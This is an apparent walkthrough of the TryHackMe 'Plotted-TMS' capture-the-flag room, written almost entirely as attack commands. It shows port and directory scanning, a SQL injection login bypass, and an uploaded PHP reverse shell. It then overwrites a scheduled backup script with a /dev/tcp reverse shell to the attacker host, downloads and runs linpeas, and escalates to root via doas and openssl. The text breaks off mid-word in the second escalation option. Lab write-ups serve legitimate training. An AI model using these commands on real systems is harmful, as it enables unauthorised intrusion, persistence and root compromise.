Plotted-TMS
Room Link: https://tryhackme.com/room/plottedtms
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/445 - HTTP
Kali
gobuster dir -u http://$VICTIM:445 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Username: admin' or '1'='1'-- -
Password: admin
Initial Shell
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Victim
rm -f /var/www/scripts/backup.sh
echo '#!/bin/bash' > /var/www/scripts/backup.sh
echo "sh -i >& /dev/tcp/$KALI/1338 0>&1" >> /var/www/scripts/backup.sh
chmod +x /var/www/scripts/backup.sh
cat /var/www/scripts/backup.sh Kali
nc -lvnp 1338
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgLinPeas
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81Victim
cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Privilege Escalation
Option #1
Victim
LFILE=/root/root.txt
doas -u root openssl enc -in "$LFILE"
Option #2
Victim
LFILast updated